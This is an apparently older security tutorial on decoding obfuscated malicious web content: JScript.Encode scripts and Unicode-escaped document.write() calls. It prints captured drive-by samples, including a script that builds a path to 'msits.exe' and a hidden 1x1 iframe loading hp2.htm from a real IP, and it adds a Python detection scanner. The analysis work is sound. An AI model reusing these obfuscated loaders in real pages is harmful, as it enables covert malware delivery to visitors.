Investigate HTTP Based Exploits

Decode Suspicious JavaScript and HTML Content

A lot of exploits that occur over the web try to be as discreet as possible. In an attempt to hide the instructions your browser downloads and executes after visiting a dangerous site, attackers encode those commands so they are not easily deciphered without special tools.

One of these special tools is already built into the browser (or else the browser itself could not understand the instructions), but there is no easy interface to that interpretation before such code is run. A handy tool for investigating the content of pages with encoded JavaScript is available at http://www.virtualconspiracy.com. Here is an example of its use:

Snippet of encoded web page:

[html] [head] [/head] [body] [DIV id="ObjectContainer"][/DIV] [IFRAME name="icounter" \
width=60 height=30 style="display:none"][/IFRAME][script type="text/JScript.Encode" \
language="JScript.Encode"]

#@~^+goAAA==@#@&P~,@#@&PP,0!Um
DkGx,MnOkmD/bGU`*@#@&P~P`@#@&P~P,~\mD~(A\+.dbWU'C7kLmYKDRmwa#+M/rW@#@&,PP,~k6P`& \
3-+M/bWURrU9+ar6cBqkU[Kh/~1lBbPex,Oq*PM+Y!D~JO*E@#@&P~~,P+^d+,k0,c(27+M/rWU bx[+X60vB \
rNWAd,1PPWv*PZ{P F#,OEMx~JgKE@#@&PP,~V~r0,`&2-+.dbW
URbU66WvrU,,aBb,"{PO8#,.+DE.x,J\3r@#@&,~P,P+^dnPb0,`(2-nM/rW   na}0`v

[/script] [/body] [/html]

Now download the script decoder from the link above, compile it (there is a Windows binary as well), and run the encoded script through it as an argument:

# gcc scrdec14.c
# ./a.out  
# cat 

[html] [head] [/head] [body] [DIV id="ObjectContainer"][/DIV] [IFRAME name="icounter" \
width=60 height=30 style="display:none"][/IFRAME][script type="text/JScript.Encode" \
language="JScript.Encode"]
   
   function Get_Win_Version()
   {
     var IEversion=navigator.appVersion;
     if (IEversion.indexOf('Windows 95') != -1) return "95"
     else if (IEversion.indexOf('Windows NT 4') != -1) return "NT"
     else if (IEversion.indexOf('Win 9x 4.9') != -1) return "ME"
     else if (IEversion.indexOf('Windows 98') != -1) return "98"
     else if (IEversion.indexOf('Windows NT 5.0') != -1) return "2K"
     else if (IEversion.indexOf('Windows NT 5.1') != -1) return "XP"
   }
 
   switch(iPrefix)
   {
   case "http://" :
                   j=InetPath.lastIndexOf('/');
                   InetPath=InetPath.slice(0,j)+'/msits.exe';
                   break;
   case "ms-its:" :
                   i=InetPath.indexOf('!');
                   j=InetPath.lastIndexOf('//');
                   InetPath=InetPath.slice(i+1,j)+'/msits.exe';
                   break;
   }
 
   var WinOS=Get_Win_Version();
   
   if ((WinOS=="95")||(WinOS=="98"))
   {
      LaunchExecutable9X(InetPath);
   }
[/script] [/body] [/html]

There is your decoded script. The exploit itself is another discussion entirely (see msits.exe in there?).

Convert Unicode content to human-readable ASCII

Similar to the above, another way to stay hidden from users, and even to bypass layer-7 content filtering, is to send the instructions as Unicode escapes. Once again the browser reads Unicode just fine and executes the given commands unfettered, but it is quite a challenge for humans to interpret. Sure, it's easy to remember a few strings such as %20, which is a space character, but the whole alphabet and all the special keys, no way. Here is a file I found while investigating a web exploit; it was named ff-FAI.html:

[A HREF=http://friendfinder.com/go/f43059 target=_blank]
[img src=http://ads.friendfinder.com/banners/ff/ffalert4.gif WIDTH=468 \
HEIGHT=60 BORDER=0][/a]

[!-- HP2 --]

[script type="text/javascript"]document.write('\u003c\u0069\u0066\u0072
\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068
\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035
\u0030\u002e\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068
\u0070\u0032\u002f\u0068\u0070\u0032\u002e\u0068\u0074\u006d
\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020
\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c
\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')[/script]

There may be easier ways to deal with this, but I came up with a creative mixture of vi and perl. Open ff-FAI.html (or whatever file you have) and enter the following command:

:%s/\\u/}\\x{/g

Then place quotation marks around the block of Unicode, precede it with the 'print' command, and tidy the braces the substitution leaves behind (drop the stray leading '}' and add a closing '}' after the last code) so that it looks like this:

print "\x{003c}\x{0069}\x{0066}\x{0072}\x{0061}\x{006d}
\x{0065}}\x{0020}\x{0073}\x{0072}\x{0063}\x{003d}\x{0022}
\x{0068}\x{0074}\x{0074}\x{0070}\x{003a}\x{002f}\x{002f}
\x{0036}\x{0039}\x{002e}\x{0035}\x{0030}\x{002e}\x{0031}
\x{0033}\x{0039}\x{002e}\x{0036}\x{0031}\x{002f}\x{0068}
\x{0070}\x{0032}\x{002f}\x{0068}\x{0070}\x{0032}\x{002e}
\x{0068}\x{0074}\x{006d}\x{0022}\x{0020}\x{0077}\x{0069}
\x{0064}\x{0074}\x{0068}\x{003d}\x{0031}\x{0020}\x{0068}
\x{0065}\x{0069}\x{0067}\x{0068}\x{0074}\x{003d}\x{0031}
\x{003e}\x{003c}\x{002f}\x{0069}\x{0066}\x{0072}\x{0061}
\x{006d}\x{0065}\x{003e}"

Run the file with perl and see what you just unveiled:

# perl ff-FAI.html

[iframe src="http://69.50.139.61/hp2/hp2.htm" width=1 height=1][/iframe]

That's it! The huge block of Unicode boils down to the covert download of a file named hp2.htm within an iframe on the open browser page. We would later find that within hp2.htm was code to fetch hp2.CHM, and then a complete compromise followed.
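Both sections above amount to the same triage step: find script blocks that hide their payload behind an encoding, and get at what they write into the page. The following is an added example (not code from the original article or from the virtualconspiracy decoder) that scans a constructed HTML fragment built from the two snippets on this page: it flags JScript.Encode blocks and reads the plaintext length from their header (assumption: the eight base64 characters after the "#@~^" marker encode a little-endian 32-bit length), and it expands \uXXXX, \u{...} and \xXX escapes inside document.write() calls so hidden 1x1 iframes and their sources can be reported without running the script.

```python
import base64
import re
import struct

# Constructed sample: the two <script> blocks dissected on this page, as one fragment.
SAMPLE_HTML = (
    '<script type="text/JScript.Encode" language="JScript.Encode">'
    '#@~^+goAAA==@#@&P~,@#@&PP,0!Um</script>\n'
    '<script type="text/javascript">document.write(\''
    '\\u003c\\u0069\\u0066\\u0072\\u0061\\u006d\\u0065\\u0020\\u0073\\u0072\\u0063\\u003d'
    '\\u0022\\u0068\\u0074\\u0074\\u0070\\u003a\\u002f\\u002f\\u0036\\u0039\\u002e\\u0035'
    '\\u0030\\u002e\\u0031\\u0033\\u0039\\u002e\\u0036\\u0031\\u002f\\u0068\\u0070\\u0032'
    '\\u002f\\u0068\\u0070\\u0032\\u002e\\u0068\\u0074\\u006d\\u0022\\u0020\\u0077\\u0069'
    '\\u0064\\u0074\\u0068\\u003d\\u0031\\u0020\\u0068\\u0065\\u0069\\u0067\\u0068\\u0074'
    '\\u003d\\u0031\\u003e\\u003c\\u002f\\u0069\\u0066\\u0072\\u0061\\u006d\\u0065\\u003e'
    "')</script>"
)

# \uXXXX, ES6 \u{...} and \xXX: the escape forms a JS engine expands inside a string literal.
ESCAPE_RE = re.compile(
    r'\\u\{([0-9a-fA-F]{1,6})\}|\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})')

def decode_js_escapes(text):
    """Expand JavaScript string escapes the way the browser would, without executing them."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2) or m.group(3), 16)), text)

def jscript_encode_length(blob):
    """Plaintext length declared by a JScript.Encode header '#@~^XXXXXX=='.
    Assumption: the base64 field holds the length as a little-endian 32-bit integer."""
    m = re.match(r'#@~\^([A-Za-z0-9+/]{6}==)', blob)
    if not m:
        return None
    return struct.unpack('<I', base64.b64decode(m.group(1)))[0]

def scan_scripts(html):
    """Return (kind, detail) findings for every <script> block in the fragment."""
    findings = []
    for m in re.finditer(r'<script([^>]*)>(.*?)</script>', html, re.S | re.I):
        attrs, body = m.group(1), m.group(2).lstrip()
        if 'jscript.encode' in attrs.lower() or body.startswith('#@~^'):
            findings.append(('jscript_encode', jscript_encode_length(body)))
            continue
        for arg in re.findall(r"document\.write\(\s*'([^']*)'", body):
            for tag in re.finditer(r'<iframe\b([^>]*)>', decode_js_escapes(arg), re.I):
                a = tag.group(1)
                src = re.search(r'src=["\']?([^"\'\s>]+)', a)
                # A 0x0 or 1x1 frame is invisible to the user: the classic covert download.
                tiny = re.search(r'width=["\']?[01]\b', a) and re.search(r'height=["\']?[01]\b', a)
                findings.append(('hidden_iframe' if tiny else 'iframe', src.group(1) if src else None))
    return findings
```

Running scan_scripts(SAMPLE_HTML) reports the encoded block with a declared length of 2810 characters and the hidden iframe pointing at http://69.50.139.61/hp2/hp2.htm, the same result the vi-and-perl trick produced above.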

Unless otherwise noted, this work is licensed with (Creative Commons Attribution License).